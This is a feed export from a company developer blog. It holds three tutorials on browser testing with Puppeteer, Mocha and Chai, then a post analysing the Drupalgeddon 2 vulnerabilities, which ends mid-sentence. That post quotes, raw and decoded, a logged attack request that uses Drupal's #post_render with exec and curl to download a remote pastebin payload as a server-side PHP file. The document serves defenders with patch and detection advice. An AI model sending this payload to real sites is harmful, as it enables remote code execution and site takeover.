Kevin Guebert Archives - ϳԹ Online /byline/kevin-guebert/ Live Bravely Thu, 12 May 2022 18:56:11 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.1 https://cdn.outsideonline.com/wp-content/uploads/2021/07/favicon-194x194-1.png Kevin Guebert Archives - ϳԹ Online /byline/kevin-guebert/ 32 32 Testing with Puppeteer – Part 1 /magazine/technology/testing-puppeteer-part-1/ Thu, 30 Aug 2018 00:00:00 +0000 /uncategorized/testing-puppeteer-part-1/ Testing with Puppeteer - Part 1

Puppeteer allows you to do anything you would do manually in Chrome but through code. Need a screenshot? Want to test form inputs? Need to test your web speed? Puppeteer can do all that and more.

The post Testing with Puppeteer – Part 1 appeared first on ϳԹ Online.

]]>
Testing with Puppeteer - Part 1

In a previous post on the ϳԹ Developer Blog, we talked about our development workflow and how it includes a testing process. Over the past couple of months, we’ve been experimenting with making our testing process more efficient and helpful for our developers. In our research, we came across a tool from Google called , “a high level API to control Chrome or Chromium over the DevTools Protocol.” In more basic terms, Puppeteer allows you to do anything you would do manually in Chrome but through code. Need a screenshot? Want to test form inputs? Need to test your web speed? Puppeteer can do all that and more.

Our tests used to be built using a tool called that ran on top of a headless browser. Our experience with Casper has unfortunately been troublesome with tests failing for no apparent reason and inconsistencies across runs. Our tests were becoming so finicky and troublesome that we started commenting out tests that we knew were succeeding in the browser but failed for Casper. We still needed our builds but Casper was not being a reliable source of information for passing and failing tests. This was obviously not a good sign, bad practice, and would lead to trouble down the line.

After experimenting and researching Puppeteer, we arrived at two questions:

  1. Should we change our tests from Casper to Puppeteer?

  2. Would Puppeteer be better and thus worth the switch?

As a team we decided it would at least be worth implementing one of our tests in Puppeteer and viewing the results.

Puppeteer + Mocha + Chai

For our test, we decided that Puppeteer would be the headless browser instance and then and would help us with assertions. Mocha and Chai are Javascript libraries to help tests determine whether an assertion passes or not. For example, we assert that the homepage has the title “ϳԹ” on it. Mocha runs the test and Chai checks the result versus the expectation and returns true or false. Each test instantiates a headless Chrome instance using Puppeteer and uses Mocha and Chai to run the assertions.

Results

Getting started with Puppeteer, Mocha, and Chai proved to be extremely straightforward and easy to follow. We were able to convert a previously failing Casper test to a working Puppeteer test within a few hours. After we were able to get one test suite running, we worked on converting all of our test to Puppeteer and removing Casper from our process. In this shift, we were able to provide developers with more tools to help debug tests that are failing. Puppeteer has the option to run Chrome in a non-headless state, so a browser window would open up with the test parameters and allow a developer to interact with the test. We also were able to implement a screenshot workflow that takes screenshots of the webpages for any failing test. Both of these options are simple parameters passed to the testing script. Our experience so far has been happy and successful and we look forward to diving deeper into Puppeteer.

Be sure to check out Part 2 to learn how we implemented Puppeteer, Mocha, and Chai to create our new test suite.

The post Testing with Puppeteer – Part 1 appeared first on ϳԹ Online.

]]>
Creating Tests with Puppeteer: Part 2 /magazine/technology/creating-tests-puppeteer-part-2/ Thu, 30 Aug 2018 00:00:00 +0000 /uncategorized/creating-tests-puppeteer-part-2/ Creating Tests with Puppeteer: Part 2

At the end of this tutorial, we will have a fully working test that implements Puppeteer, Mocha, and Chai for ϳԹ Online.

The post Creating Tests with Puppeteer: Part 2 appeared first on ϳԹ Online.

]]>
Creating Tests with Puppeteer: Part 2

In our lastpost about implementing tests with Puppeteer, we did a high-level overview of some of the decisions we made to switch from Casper to Puppeteer. In this post, we are going to go over the code that makes our tests work.

Goals

At the end of this tutorial, we will have a fully working test that implements , , and for ϳԹ Online.

Initialization

  1. Let’s first start with creating a new folder in the directory of your choosing.

  2. Inside this folder, run npm init – feel free to name it however you like and fill in any values you prefer, there is nothing special in this step

  3. Next, we need to install 4 modules. Two of them are devDependencies and two are regular dependencies

npm install --save lodash puppeteer
npm install --save-dev mocha chai

I did not mention lodash in the previous post, but it is a utility library that we will use minimally.

  1. After installation completes, create an empty bootstrap.js file to bootstrap our tests in the base directory.

  2. Lastly for initialization, we need to modify package.json to run mocha correctly:


...
"scripts": {
	"test": "mocha bootstrap.js";
}
...
  1. In your terminal, if you run npm test you should get an output saying 0 passing. This is exactly what we want – it signals everything is correctly installed and mocha is running.

Bootstrapping the Tests

The next thing we need to do is bootstrap all of our tests with puppeteer.

  1. Head back to your text editor and open up the bootstrap.js file.

  2. We now need to import the libraries we installed:


const puppeteer = require('puppeteer');
const { expect } = require('chai');
const _ = require('lodash');
  1. One of the benefits of using mocha is that we can define before and after functions that will run before our test suite and then after. This is ideal for setup and cleanup after our tests run.

  2. We are going to create a before function to setup puppeteer


before (async function () {
	global.expect = expect;
	global.browser = await puppeteer.launch({headless: true});
});

The before function does 2 things – it setups expect as a global variable to use in all of our tests and it also creates a puppeteer browser instance that we can reuse. We do this so we are not creating a new browser for each test, just using a single one.

  1. Inside of launch() for puppeteer we are passing in the option of headless: true. This flag is what determines how Chrome will launch – a physical browser or not. For now, we are setting it to be headless but, if you wanted to see an actual Chrome browser open up and run you would set it to false.

  2. Now for our after function, we are just going to do a little cleanup:


after (function () {
	browser.close();
});

All that is doing is closing down the puppeteer browser instance we created.

Creating Your First Test

  1. With all the setup work now complete, we can create our first test! For this test, we are going to keep it really simple and make sure that ϳԹ's homepage has the correct title.

  2. Before we get started, check out the for some examples and documentation of how to write tests.

  3. Next, go ahead and create a directory within your project called test

  4. Inside the test directory, create a new file called homepage.spec.js – this will be the file where we write our homepage tests.

  5. To start our test inside homepage.spec.js we have to describe it


describe('Homepage Test', function() {
});
  1. In the previous section we set up the base bootstrap for all tests. Now, we need to set up a before function that handles what should happen before the tests are run. In this scenario it needs to:

    • Open a new tab

    • Go to a specific URL

  2. Within the describe function, let's create the before initialization:


before (async () => {
	page = await browser.newPage();
	await page.goto('', { waitUntil: 'networkidle2' });
});
  1. With the before successfully created, we can now write our test right below the before function!


it("should have the title", async () => {
	expect(await page.title()).to.eql("ϳԹ Online")
});

The above test should read almost like a sentence – we “expect” the page title to equal ϳԹ Online. Pretty simple, right?

Finalizing Our Test

  1. With our test complete, we just need to do one more thing – update our package.json script.


...
"scripts": {
	"test": "mocha bootstrap.js --recursive test/ --timeout 30000"
}
...

  1. We added two more parameters to the test script:

    • The --recursive test/ parameter tells mocha to look into the test/ folder and recursively run all tests that it finds. For us it is only 1, but you can imagine a folder full or subfolder and subtests that all need to be run.

    • The --timeout 30000 is setting the mocha timeout to be 30 seconds instead of 2000ms. This is important as it takes some time for puppeteer to launch and, if we didn't have that, the tests would fail to launch!

  2. With that now complete, we can run our tests with a simple npm test

  3. We should now see that the test has run correctly and the ϳԹ homepage has the title “ϳԹ Online”.

  1. If you want to double check to make sure it is working, go back to homepage.spec.jsand change the title to expect something else like “Welcome to ϳԹ!”


it("should have the title", async () => {
	expect(await page.title()).to.eql("Welcome to ϳԹ")
});
  1. If we do that, and rerun the tests, we should see that it has failed. Congratulations you are up and running!

If you’ve run into any errors or problems, visit the gist to compare your code. Be sure to check out Part 3 of this series of how to pass custom parameters to your tests and generate screenshots for failing tests!

The post Creating Tests with Puppeteer: Part 2 appeared first on ϳԹ Online.

]]>
Customizing Puppeteer Tests: Part 3 /magazine/technology/customizing-your-puppeteer-tests-part-3/ Thu, 30 Aug 2018 00:00:00 +0000 /uncategorized/customizing-your-puppeteer-tests-part-3/ Customizing Puppeteer Tests: Part 3

Today, we are going to work on customizing tests by passing in custom parameters.

The post Customizing Puppeteer Tests: Part 3 appeared first on ϳԹ Online.

]]>
Customizing Puppeteer Tests: Part 3

In our previous two posts, we talked about why we switched to Puppeteer and how to get started running tests. Today, we are going to work on customizing tests by passing in custom parameters.

Reasons for Custom Parameters

We need to be able to pass in custom parameters for debugging and local testing. Our tests currently run through Travis CI, but if a developer needs to run the tests locally, the options are not exactly the same.

  • The URL for the test will be different

  • The developer usually needs to debug the tests to determine why they failed

We implemented three custom parameters to help with this problem:

  1. Ability to pass in a custom URL

  2. Ability to run Chrome in a non-headless state

  3. Ability to have screenshots taken of failing tests

We are going to go through all of these custom parameters and learn how to implement them.

Pass in a Custom URL

At ϳԹ, we run our tests on a development Tugboat Environment and our local machines. The two base URLS for these environments differ but the paths to specific pages do not. For example, our local machines point to http://outside.test while our Tugboat environments are unique for each build.

We are going to pass a parameter that looks like this: --url={URL}. For our local site, the full command ends up being npm test -- --url=http://outside.test.

Let's get started in setting this up.

  1. We need to set up a variable that will be accessible across all files that contains the base URL. In bootstrap.js inside the before function, we are going to name the variable baseURL:


before (async function () {
  ...
  global.baseURL = '';
  ...
});
  1. Now we need to access the variables that are passed into the before s function from the command line. In Javascript, these arguments are stored in process.argv. If we console.log them real quick, we can see all that we have access to:


global.baseURL = '';
console.log(process.argv);
  1. Head back to your terminal and run npm test -- --url=. You should see an array of values printed:


[ '/usr/local/Cellar/node/10.5.0_1/bin/node',
  'bootstrap.js',
  '--recursive',
  'test/',
  '--timeout',
  '30000',
  '--url=' ]
  1. From the above array, we can see that our custom parameter is the last element. But don't let that fool you! We cannot guarantee that the URL will be the last parameter in this array (remember, we have 2 more custom parameters to create). So we need a way to loop through this list and retrieve the URL:

  2. Inside before in bootstrap.js we are going to loop through all the parameters and find the one we need by the url key:


for (var i = 0; i < process.argv.length; i++) {
  var arg = process.argv[i];
  if (arg.includes('--url')) {
    // This is the url argument
  }
}
  1. In the above loop, we set arg to be the current iteration value and then check if that string includes url in it. Simple enough, right?

  2. Now we need to set the global.baseURL to be the url passed in through the npm test command. However, we need to make note that the url argument right now is the whole string --url=www.outsideonline.com. Thus, we need to modify our code to retrieve only www.outsideonline.com. To retrieve only the url, we are going to split the string at the equal sign using the Javascript function split. split works by creating an array of the values before and after the defined string to split at. In our case, splitting --url=www.outsideonline.com with arg.split("=") will return ['--url', 'www.outsideonline.com']. We can then assume the URL will be at the first index of the split array.


if (arg.includes('url')) {
  // This is the url argument
  global.baseURL = arg.split("=")[1];
}
  1. Now that we have our URL, we need to update our tests to use it.

Open up homepage.spec.js and we are going to edit the before function in here:


before (async () => {
  page = await browser.newPage();
  await page.goto(baseURL + '/', { waitUntil: 'networkidle2' });
});
  1. We are also going to keep our test from the previous post on Puppeteer:


it("should have the title", async () => {
  expect(await page.title()).to.eql("ϳԹ Online")
});

  1. Now, if you run the tests with the url added it should work as it previously did! npm test -- --url=

  2. Let's create another test to show the value of passing the url through a custom parameter. Inside the test folder, create a file called contact.spec.js. We are going to test the "Contact Us" page found here: /contact-us

  3. In this test, we are going to make sure the page has the title "Contact Us" using a very similar method:


describe('Contact Page Test', function() {
  before (async () => {
    page = await browser.newPage();
    await page.goto(baseURL + '/contact-us', { waitUntil: 'networkidle2' });
  });

  it("should have the title", async () => {
    expect(await page.title()).to.eql("Contact Us | ϳԹ Online")
  });
});

As you can see above, using the baseURL, it is very easy to change the page you want to test based on the path. If for some reason we needed to test in our local environment, we only have to change the --url parameter to the correct base URL!

View a Chrome Browser during Tests (non-headless)

Having the ability to visually see the Chrome browser instance that tests are running in helps developers quickly debug any problems. Luckily for us, this is an easy flag we just need to switch between true and false.

  1. The parameter we are going to pass in is --head to indicate that we want to see the browser (instead of passing in --headless which should be the default).

  2. Our npm test script will now look something like this:

npm test -- --url= --head

  1. Inside of before in bootstrap.js, we need to update that for loop we created before to also check for the head parameter:


global.headlessMode = true;
for (var i = 0; i < process.argv.length; i++) {
  var arg = process.argv[i];
  if (arg.includes('url')) {
    // This is the url argument
    global.baseURL = arg.split("=")[1];
  }
  if (arg.includes("--head")) {
    global.headlessMode = false;
    // Turn off headless mode.
  }
}
  1. In this instance, we only need to check if the parameter exists to switch a flag! We are using the parameter headlessMode to determine what gets passed into the puppeteerlaunch command:


global.browser = await puppeteer.launch({headless: global.headlessMode});
  1. Lastly, if we are debugging the browser we probably do not want the browser to close after the tests are finished, we want to see what it looks like. So inside the after function in bootstrap.js we just need to create a simple if statement:


if (global.headlessMode) { 
  browser.close();
}
  1. And that's it! Go ahead and run npm test -- --url= --head and you should see the tests in a browser!

Take Screenshots of Failing Tests

Our last custom parameter is to help us view screenshots of failing tests. Screenshots can be an important part of the workflow to help quickly debug errors or capture the state of a test. This is going to look very similar to the head parameter, we are going to pass a --screenshot parameter.

  1. Let's again update before in bootstrap.js to take in this new parameter:


if (arg.includes("screenshot")) {
  // Set to debug mode.
  global.screenshot = true;
}
  1. Next up, we are going to implement another mocha function - afterEach. afterEach runs after each test and inside the function, we can access specific parameters about the test. Mainly, we are going to check and see if a test failed or passed. If it failed, we then know we need a screenshot. The afterEach function can go in bootstrap.js because all tests we create will be using this:


afterEach (function() {
  if (global.screenshot && this.currentTest.state === 'failed') {
    global.testFailed = true;
  }
});
  1. After a test has failed, we now has a global testFailed flag to trigger a screenshot in that specific test. Note - bootstrap.js does not have all the information for a test, just the base. We need to let the individual test files know if we need a screenshot of a failed test so we get a picture of the right page.

  2. Head back to homepage.spec.js and we are going to implement and after function.


after (async () => {
  if (global.testFailed) {
    await page.screenshot({
      path: "homepage_failed.png",
      fullPage: true
    });
    global.testFailed = false;
    await page.close();
    process.exit(1);
  } else {
    await page.close();
  }
});
  1. The above function checks if the test has failed based on the testFailed flag. If the test failed, we take a full page screenshot, reset the flag, close the page, and exit the process.

  2. Unfortunately, the above code works best inside each test file so there will be some code duplication across tests. The path setting makes sure that no screenshot overrides another tests screenshot by setting the filename to be the one of the test. The screenshot will be saved in the base directory where we run the npm test command from.

  3. To test and make sure this works, let's edit homepage.spec.js to expect a different title - like "ϳԹ Magazine"


it("should have the title", async () => {
  expect(await page.title()).to.eql("ϳԹ Magazine")
});
  1. We know this one will fail, so when we run npm test -- --url=https://cdn.outsideonline.com --screenshot we should get a generated screenshot! Look for a file named homepage_failed.png.

Recap & Final Thoughts

Add custom parameters to your npm script is fairly simple once you get the hang of it. From there, you can easily customize your tests based on these parameters. Even with the custom parameters we have created, there is room for improvement. Stricter checking of the parameters would be a good first step to rule out any unintended use cases. With the custom url, headless mode, and screenshots, our tests are now easier to manage and debug if something ever fails. Check out the , , and to learn more!

The post Customizing Puppeteer Tests: Part 3 appeared first on ϳԹ Online.

]]>
Drupalgeddon 2 – What & Why /magazine/technology/drupalgeddon-2-what-why/ Wed, 11 Jul 2018 00:00:00 +0000 /uncategorized/drupalgeddon-2-what-why/ Drupalgeddon 2 - What & Why

This past March and April, the Drupal Security Team announced two highly critical security patches: “Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002” and "Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004".

The post Drupalgeddon 2 – What & Why appeared first on ϳԹ Online.

]]>
Drupalgeddon 2 - What & Why

This past March and April, the Drupal Security Team announced two highly critical security patches: “” and ““. First off, before I go any further, if you operate a Drupal site and have not applied these patches already, please patch your site right now. Unfortunately (and not to get too pessimistic), if your site has some traffic and the patch has not been applied, your site is most likely already hacked. If your site was exploited, please visit immediately.

Security Patch #1 – SA-CORE-2018-002

If we take a dive into the patch file provided by the Drupal Security Team, we can see two files were edited:

  1. includes/bootstrap.inc
  2. includes/request-sanitizer.inc

In these files, a new line was added to bootstrap.inc which calls a new function within request-sanitizer. Two new functions were added to request-sanitizer:

  1. sanitize
  2. stripDangerousValues

Looking at the flow, the sanitize() function is added to bootstrap.inc to check the parameters being passed through. For those parameters, it will remove “dangerous values” from the parameters, thus the name. If you check out the code for Drupal 7.x , you can see that the security patch is fairly small. Don't let the amount of code fool you though, the implications are massive.

The Issue

For all version 6, 7, and 8 of Drupal there was a vulnerability with sending data through the Form API – if there exists a property key with a hash sign#, the data associated with it would pass through. Why is this an issue? Well if you think about how developers use some of the APIs in Drupal, many of them contain #signs in them. Take one look at the , and you can see many, many properties marked with a # – #prefix, #markup, #post_render, #pre_render, #type, etc. This means that a hacker could in theory create a GET or POST request to certain URLs, passing in whatever data they wanted. Scary.

Security Patch #2 – SA-CORE-2018-004

SA-CORE-2018-004 piggybacks on the first security patch but has a little different user case. If you look at the security list you will see “20∕25 AC:Basic/A:User/CI:All/II:All/E:Exploit/TD:Default.” The “A:User” comes from and means that it applies for “user-level access.” What does that mean? It means that there must be some level of permission for issue to be exploited. While that may be some relief, it is still highly critical. If a hacker successfully exploited the first security issue, then they would easily be able to maneuver past this. Looking at the patch, we can see 4 impacted files:

  1. bootstrap.inc
  2. common.inc
  3. request-sanitizer.inc
  4. file.module

The main takeaway from this patch is the cleanDestination() function added to request-sanitizer.inc (which was added in the first security patch). The purpose of cleanDestination is to “remove the destination if it is dangerous” per code comments. This function uses the previously built stripDangerousValues and determines if the destination is “dangerous.” If it is, it will unset the destination from the request and trigger an error: “Potentially unsafe destination removed from query string parameters (GET) because it contained the following keys: @keys.” This adds another layer of security to requests sent to Drupal alongside the stripDangerousValues.

Exploitations in the Wild

The question you may be asking yourself now is “will this happen to me?” Yes. Yes, it will.

Back in March, I was the one who had the opportunity to apply the fix to Drupal Core. A fairly simple process that took all of 5 minutes. So, in thinking about the security patch almost a month later, I decided to do some digging into our logs to see if anyone had actually attempted to use this exploitation on our site. I used references from the , a site that “gathers millions of intrusion detection log entries every day”, to pinpoint exactly what to look for. In their article ““, hackers can be seen trying to manipulate different API calls with the # sign.

As it so happens, ϳԹ Online was targeted in the past two weeks with this exploit.

134.196.51.197 - - [19/Apr/2018:07:24:26 +0000] "POST /category/indefinitelywild/?q=user/password&name[%23post_render][]=exec&name[%23markup]=curl+-o+misc%2fserver.php+https%3a%2f%2fpastebin.com%2fraw%2fhhWU03ih&name[%23type]=markup HTTP/1.1" 200 10326 "-" "Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0"

Looking at that request from our logs above, it already looks very suspicious. There shouldn't be any POST requests going to a category page, especially not a user POST request. Let's clean it up a little:

POST /category/indefinitelywild/?q=user/password&name[#post_render][]=exec&name[#markup]=curl+-o+misc/server.php+https://pastebin.com/raw/hhWU03ih&name[#type]=markup

Immediately there are some suspicious aspects to this request. First off, exec is a PHP function used to immediately execute code. Secondly, the code is sending a curl request to a pastebin URL which sounds dangerous. Basically, the hacker was trying to execute whatever functionality was in their pastebin. When the post_render function fired, it would call exec on curl+-o+misc/server.php+https://pastebin.com/raw/hhWU03ih which would download whatever is in the pastebin and run it. Scary scary scary. Note, I went to the pastebin URL, it has been removed.

For the second security patch, we stayed diligent, patched our site as soon as possible, and thankfully didn't see any problems. Fortunately we have the resources to do that because the second security patch had known exploits in the wild hours after it was released.

What Should You Look For?

Exploitations for this issue are most commonly pointed at anything dealing with user. Why? There is one common form in Drupal sites that hackers can assume – user login, user registration, user password reset, etc. All Drupal sites have users associated with them otherwise they would be static websites. Thus, hackers use this common denominator on all sites instead of trying to search page by page to find a form.

Another thing to look for is any passing of exec in a URL – this is a request trying to execute code. Lastly, in these requests, the only possible targets are parameters with the # sign.

If you suspect that your site has been hacked, here are a couple signs and methods that have been shared online:

  1. The most obvious, but also still-used way is to replace the homepage. Some hackers replace the homepage announcing the hack and a link to their profile to “pay” them.

  2. New users added to your site that you don't recognize.

  3. If you have access to the code repository with source control like git, if you run git status and notice new php file, changes to js files, etc. that you know were not part of your code changes, then hackers most likely were able to access them.

  4. Another sneaky attack is by injecting